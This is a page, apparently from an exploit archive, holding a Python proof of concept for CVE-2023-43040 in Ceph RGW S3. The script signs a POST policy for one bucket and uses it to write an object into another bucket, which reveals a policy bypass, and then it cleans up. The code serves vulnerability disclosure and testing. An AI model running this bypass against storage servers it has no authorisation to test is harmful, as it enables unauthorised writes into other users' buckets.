4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2023-43040.py PY
import base64
import datetime
import hashlib
import hmac
import json
import uuid

import boto3
import pytz
import requests
from botocore.client import Config

def connect(access_key, secret_key, endpoint, is_secure, ssl_verify):
    return boto3.client(service_name='s3',
                        aws_access_key_id=access_key,
                        aws_secret_access_key=secret_key,
                        endpoint_url=endpoint,
                        use_ssl=is_secure,
                        verify=ssl_verify,
                        config=Config(signature_version='s3v4'))


def create_bucket(connection, bucket_name):
    bucket_name = bucket_name[0:10]

    print("[I] Creating bucket: {}".format(bucket_name))

    bucket_creating = connection.create_bucket(Bucket=bucket_name)
    if bucket_creating['ResponseMetadata']['HTTPStatusCode'] == 200:
        return bucket_name

    print("[E] Bucket creation failed!")
    print(bucket_creating)


def delete_bucket(connection, bucket_name):
    response = connection.list_objects_v2(
        Bucket=bucket_name,
    )
    while response['KeyCount'] > 0:
        response = connection.delete_objects(
            Bucket=bucket_name,
            Delete={
                'Objects': [{'Key': obj['Key']} for obj in response['Contents']]
            }
        )
        response = connection.list_objects_v2(
            Bucket=bucket_name,
        )

    response = connection.delete_bucket(
        Bucket=bucket_name
    )

    if response['ResponseMetadata']['HTTPStatusCode'] == 204:
        print("[I] Bucket deleted successfully! {}".format(bucket_name))
        return

    print("[E] Bucket deletion failed!")
    print(response)


def generate_policy(bucket_name):
    expires = datetime.datetime.now(pytz.utc) + datetime.timedelta(seconds=+6000)

    policy_document = {
        "expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),
        "conditions": [
            {"bucket": bucket_name},
            ["starts-with", "$key", "foo"],
            {"acl": "private"},
            ["starts-with", "$Content-Type", "text/plain"],
            ["content-length-range", 0, 1024]
        ]
    }

    return base64.b64encode(bytes(json.JSONEncoder().encode(policy_document), 'utf-8'))


def sign_policy(policy, secret_key):
    return base64.b64encode(
        hmac.new(bytes(secret_key, 'utf-8'), policy,
                 hashlib.sha1).digest())


def post_object(endpoint, bucket_name, bad_bucket_name, policy, access_key, signature, ssl):
    payload = {
        "key": "${filename}",
        'bucket': bucket_name,
        "AWSAccessKeyId": access_key,
        "signature": signature,
        "acl": "private",
        "policy": policy,
        "Content-Type": "text/plain",
        'file': ('foo.txt', 'bar')
    }

    return requests.post("{}/{}".format(endpoint, bad_bucket_name), files=payload, verify=ssl)


if __name__ == '__main__':
    print(
        "  ______   ______    ___  ___  ___  ____    ____ ____ ___  ____ ___ \n / ___/ | / / __/___|_  |/ _ \|_  ||_  /___/ / /|_  // _ \/ / // _ \ \n/ /__ | |/ / _//___/ __// // / __/_/_ <___/_  _//_ </ // /_  _/ // /\n\___/ |___/___/   /____/\___/____/____/    /_//____/\___/ /_/ \___/ \nCEPH RGW S3 CVE-2023-43040 PoC\nby Trendyol Vulnerability Management Team - @riza.sabuncu\n")
    bucket_name_prefix = "bckt"

    import argparse
    import sys


    def main():
        parser = argparse.ArgumentParser(description="RGW S3 CVE-2023-43040 PoC")

        parser.add_argument('--access_key', type=str, help="RGW Access Key")
        parser.add_argument('--secret_key', type=str, help="RGW Secret Key")
        parser.add_argument('--endpoint', type=str, help="RGW S3 Endpoint")

        parser.add_argument('--is_secure', type=bool, nargs='?', const=False, default=False,
                            help="SSL (default: False)")
        parser.add_argument('--ssl_verify', type=bool, nargs='?', const=False, default=False,
                            help="SSL Verification (default: False)")

        args = parser.parse_args()

        if not args.access_key or not args.secret_key or not args.endpoint:
            parser.print_help(sys.stderr)
            sys.exit(1)

        if args.endpoint[-1] == '/':
            args.endpoint = args.endpoint[:-1]

        print("[I] Connecting to RGW S3 Endpoint: {}".format(args.endpoint))

        connection = connect(args.access_key,
                             args.secret_key,
                             args.endpoint,
                             args.is_secure,
                             args.ssl_verify)

        new_bucket = create_bucket(connection,
                                   "{}{}".format(
                                       bucket_name_prefix,
                                       uuid.uuid4().hex))

        bad_bucket = create_bucket(connection,
                                   "{}{}".format(
                                       bucket_name_prefix,
                                       uuid.uuid4().hex))

        policy = generate_policy(new_bucket)
        signature = sign_policy(policy, args.secret_key)

        post_status = post_object(args.endpoint,
                                  new_bucket,
                                  bad_bucket,
                                  policy,
                                  args.access_key,
                                  signature,
                                  args.ssl_verify)

        if post_status.status_code == 204:
            print("[🚨] Vulnerable! Status code: {}".format(post_status.status_code))
        else:
            print("[✅] Not vulnerable! Status code: {}".format(post_status.status_code))

        delete_bucket(connection, new_bucket)
        delete_bucket(connection, bad_bucket)


    if __name__ == "__main__":
        main()